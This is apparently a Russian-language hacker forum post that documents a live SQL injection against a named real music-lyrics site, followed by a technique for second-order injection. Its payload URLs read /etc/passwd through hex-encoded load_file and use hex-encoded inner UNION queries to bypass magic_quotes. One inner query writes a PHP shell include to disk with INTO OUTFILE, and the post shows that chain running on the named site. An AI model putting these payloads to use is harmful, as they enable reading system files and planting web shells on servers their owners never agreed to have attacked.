Есть MySQL инъекция:
http://www.thefump.com/lyrics.php?id=-99999+union+select+1,load_file(0x2f6574632f706173737764),3,4,USER(),6,7,8,9,10,VERSION(),12,13/*
смысл в том, что текущий пользователь БД root и как видно file_priv есть, но казалось бы шелл через into outfile залить нельзя, так как экранируются кавычки, на самом деле шелл здесь (и в подобных скулях) через into outfile залить не сложно.
К теории, есть например такой скрипт:
<?php
mysql_connect('localhost','root','');
mysql_select_db('intbrd');
$id=$_GET["id"];
$sql = "SELECT u_id,u__email,u__name FROM `User` where u_id=".$id;
$result = MySQL_QUERY($sql);
echo mysql_error();
while($us = MySQL_FETCH_ARRAY($result))
{
echo $us['u__email'].":".$us['u__name'];echo "<br>";
$onl = MySQL_QUERY("SELECT o_uid,o_key FROM online WHERE o_uid = ".$us["u_id"]);
while($usonl = MySQL_FETCH_ARRAY($onl))
echo $usonl["o_uid"].':'.$usonl["o_key"];
}
?>
(набросал я его чисто для наглядности и примера и показываю на примере своей бд)
обратившись к скрипту:
http://localhost/erase.php?id=-2+union+select+1,2,3/*
видим:
2:3
обратившись:
http://localhost/erase.php?id=-2+union+select+0x27,2,3/*
(0x27- код кавычки) видим:
2:3
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in Z:\home\localhost\www\erase.php on line 20
происходит это потому, что данные, полученные из первого запроса, вставляются во второй запрос.
Сделаем "внутренний" инъект-запрос:
-2 union select '999',111/*
захексим его и подставим в первое поле первого ("внешнего") запроса:
http://localhost/erase.php?id=-2+union+select+0x2D3220756E696F6E2073656C6563742027393939272C3131312F2A,2,3/*
результат:
2:3
999:111
т.к. данные полученные из sql-запроса не так часто слешируют/фильтруют то получается что этот "внутренний" запрос выполняется без ошибок, даже при наличии кавычек.
Если "внутренний" запрос будет:
-2 union select '<?php include "shell.php"; ?>,111 into outfile '/bla/bla/bla.php'/*
то в запросе
$onl = MySQL_QUERY("SELECT o_uid,o_key FROM online WHERE o_uid = ".$us["u_id"])
он выполнится без проблем даже при magic_quotes on
Обратимся к первой инъекции, если мы в третье поле подставим:
-1 union select 'magic_qotes is sux'/*
и выполним:
http://www.thefump.com/lyrics.php?id=-99999+union+select+1,2,0x2D3120756E696F6E2073656C65637420276D616769635F716F74657320697320737578272F2A,4,5,6,7,8,9,10,11,12,13/*
увидим безобидную надпись
magic_qotes is suxа могли бы составить и более опасный запрос с присутствием into outfile 'blabla' и он тоже бы выполнился.